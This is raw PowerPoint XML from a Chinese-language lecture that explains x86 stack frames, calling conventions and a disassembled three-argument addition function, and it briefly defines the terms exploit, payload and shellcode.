            <a:ext cx="6096000" cy="397031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在压栈的过程中，</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寄存器的值不断减小（对应于栈从内存高地址向低地址生长）。压入栈内的数据包括调用参数、返回地址、调用函数的基地址，以及局部变量，其中调用参数以外的数据共同构成了被调用函数（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）的状态。在发生调用时，程序还会将被调用函数（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）的指令地址存到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寄存器内，这样程序就可以依次执行被调用函数的指令了。</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看过了函数调用发生时的情况，就不难理解函数调用结束时的变化。变化的核心任务是丢弃被调用函数（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）的状态，并将栈顶恢复为调用函数（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首先被调用函数的局部变量会从栈内直接弹出，栈顶会指向被调用函数（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BEDC965-E6E6-4685-9ACE-9DB1A068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887" y="1030820"/>
            <a:ext cx="4572638" cy="4525006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD0F8543-7244-4548-8DD9-705790DEACB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7865630" y="5716709"/>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将被调用函数的局部变量弹出栈外</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789DDBCC-41FD-46FF-8E4F-9815B5D7C907}"/>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428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8BD08833-B5F9-48EE-A6B6-5A9414488AFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431912" y="273551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然后将基地址内存储的调用函数（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）的基地址从栈内弹出，并存到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（基地址）信息得以恢复。此时栈顶会指向返回地址。</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0C80AA8-108B-442D-A019-3047C696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413" y="1068045"/>
            <a:ext cx="4658375" cy="4258269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4E38BD6-CCA7-4B6A-B806-11DA690FC193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762611" y="5326314"/>
            <a:ext cx="39819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）的基地址（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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）弹出栈外，并存到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp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A4B9A076-914F-40E4-8C98-74425838740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459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AB9C875E-D211-4E66-B249-DF90D79401A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536619" y="2667951"/>
            <a:ext cx="6096000" cy="147732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再将返回地址从栈内弹出，并存到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（指令）信息得以恢复。</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至此调用函数（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）的函数状态就全部恢复了，之后就是继续执行调用函数的指令了。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7115AB59-B4A3-4FBB-BE71-A367114B2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57" y="1372375"/>
            <a:ext cx="4591691" cy="3791479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{388184CF-06F8-4F37-9B0A-7BB5D8CA5401}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7868863" y="5163854"/>
            <a:ext cx="35358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将被调用函数的返回地址弹出栈外，并存到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip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B3263A0-C094-4A6B-A50B-D31F9371A135}"/>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849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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6821995" y="4334704"/>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00000000 &lt;callee&gt;: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0:   55          push   %ebp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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          pop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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Shape 237"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6821995" y="1340504"/>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12:   55              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   %ebp</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38" name="Shape 238"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652144" y="1319939"/>
            <a:ext cx="4195600" cy="3377200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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callee(int a, int b, int c)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a + b + c;</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caller(void)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int ret;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callee(1, 2, 3);</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4;</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ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>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239" name="Shape 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078395" y="2882363"/>
            <a:ext cx="1082000" cy="5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文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E213CC25-F6BE-4F12-94DB-556019DA2B1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261036" y="4584843"/>
            <a:ext cx="552157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x86</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使用栈来传递参数</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存放返回值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amd64</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前</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个参数依次存放于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>rdi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rsi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rdx</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rcx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r8</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r9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器中</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第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>个以后的参数存放于栈中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{221FAE31-FEFE-4584-82AB-272242EC9B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652144" y="761321"/>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1" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DB8EDCB-D9F1-49AD-849F-29198299935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A2071F-F8D6-449D-AFBE-4E92757D2704}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2962141" y="2274838"/>
            <a:ext cx="5551520"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exploit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用于攻击的脚本与方案</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payload</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攻击载荷，是的目标进程被劫持控制流的数据</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shellcode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调用攻击目标的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205DEE00-5020-4663-B178-6141E9161323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3265714"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一次简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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531739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46" name="Shape 24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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   %ebp</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47" name="Shape 24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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="248" name="Shape 248"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="249" name="Shape 24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50" name="Shape 25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1" name="Shape 25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52" name="Shape 252"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="1908581"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="253" name="Shape 25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54" name="Shape 25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8D839474-1063-4664-B889-74C8FE35E10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29B207E3-6E01-4E5F-8503-132EBEBBEC1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Shape 26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61" name="Shape 26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62" name="Shape 26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63" name="Shape 263"/>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64" name="Shape 264"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6099368" y="2208367"/>
            <a:ext cx="1847033" cy="365600"/>
            <a:chOff x="3512200" y="1633500"/>
            <a:chExt cx="1385275" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="265" name="Shape 265"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3512200" y="1633500"/>
              <a:ext cx="9006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266" name="Shape 26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Shape 267"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="2102375"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="268" name="Shape 26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69" name="Shape 26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683F1B6D-43BA-4E9B-88E9-D2ED8F8A15B9}"/>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E5242FB6-B2FC-4E5A-8279-67DC58FB085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Shape 27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76" name="Shape 27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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sub    $0x10,%esp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77" name="Shape 27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78" name="Shape 278"/>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279" name="Shape 279"/>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0" name="Shape 280"/>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1" name="Shape 281"/>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2" name="Shape 282"/>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83" name="Shape 283"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="284" name="Shape 28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285" name="Shape 28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6" name="Shape 286"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="3847279"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="287" name="Shape 28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88" name="Shape 28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9" name="Shape 289"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="2314981"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="290" name="Shape 29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91" name="Shape 29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1" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A8638DC-FA4E-4FAA-AC7E-C720DB63C02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05F0217E-665E-4988-AC98-10555AAA443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98" name="Shape 29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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   $0x3</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   $0x2</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   $0x1</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99" name="Shape 29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00" name="Shape 30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01" name="Shape 30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2" name="Shape 30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3" name="Shape 30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4" name="Shape 30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05" name="Shape 305"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="306" name="Shape 306"/>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07" name="Shape 307"/>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08" name="Shape 308"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444788" y="5076241"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="309" name="Shape 30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10" name="Shape 31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11" name="Shape 3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12" name="Shape 3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13" name="Shape 3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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="314" name="Shape 314"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="2922700"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="315" name="Shape 31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16" name="Shape 31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4" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{853C4DDC-5FE3-4A4F-8411-85A63C6AB2C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6" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB651D2C-3E25-46D0-896F-55EC3D2B9E0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Shape 32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23" name="Shape 32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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>call   1f &lt;callee&gt;</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324" name="Shape 32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25" name="Shape 32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26" name="Shape 32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7" name="Shape 32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8" name="Shape 32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9" name="Shape 32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30" name="Shape 330"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="331" name="Shape 33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32" name="Shape 33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33" name="Shape 333"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444788" y="5485680"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="334" name="Shape 33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35" name="Shape 33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36" name="Shape 336"/>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37" name="Shape 337"/>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38" name="Shape 338"/>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39" name="Shape 339"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="340" name="Shape 340"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="4696937"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="Shape 34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42" name="Shape 34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 name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A36658-4A28-410E-B8D1-1F764590CD4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476BCF5A-39EA-46F4-B873-3F2596DE622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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   %ebp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49" name="Shape 349"/>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50" name="Shape 350"/>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51" name="Shape 351"/>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52" name="Shape 352"/>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3" name="Shape 353"/>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4" name="Shape 354"/>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5" name="Shape 355"/>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56" name="Shape 356"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798409" y="5910533"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1633503"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="357" name="Shape 357"/>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358" name="Shape 35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59" name="Shape 35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60" name="Shape 36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61" name="Shape 36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62" name="Shape 36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63" name="Shape 36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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="5103337"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="365" name="Shape 36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66" name="Shape 36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3" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBC312AD-6758-4063-BECA-B0DEA437CFA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D55193B5-259B-4339-A62B-A6F37CA3BC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Shape 37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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    0x8(%ebp),%edx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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    0xc(%ebp),%eax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t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>add    %eax,%edx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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    0x10(%ebp),%eax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t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>add    %edx,%eax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73" name="Shape 37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74" name="Shape 37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75" name="Shape 37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76" name="Shape 37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7" name="Shape 37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8" name="Shape 37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9" name="Shape 37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80" name="Shape 380"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798409" y="5910533"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1633503"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="381" name="Shape 381"/>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 %ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="382" name="Shape 38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83" name="Shape 38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84" name="Shape 38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85" name="Shape 38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86" name="Shape 38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87" name="Shape 38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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="388" name="Shape 388"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="385" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5089200" y="5052133"/>
            <a:ext cx="2857200" cy="253600"/>
          </a:xfrm>
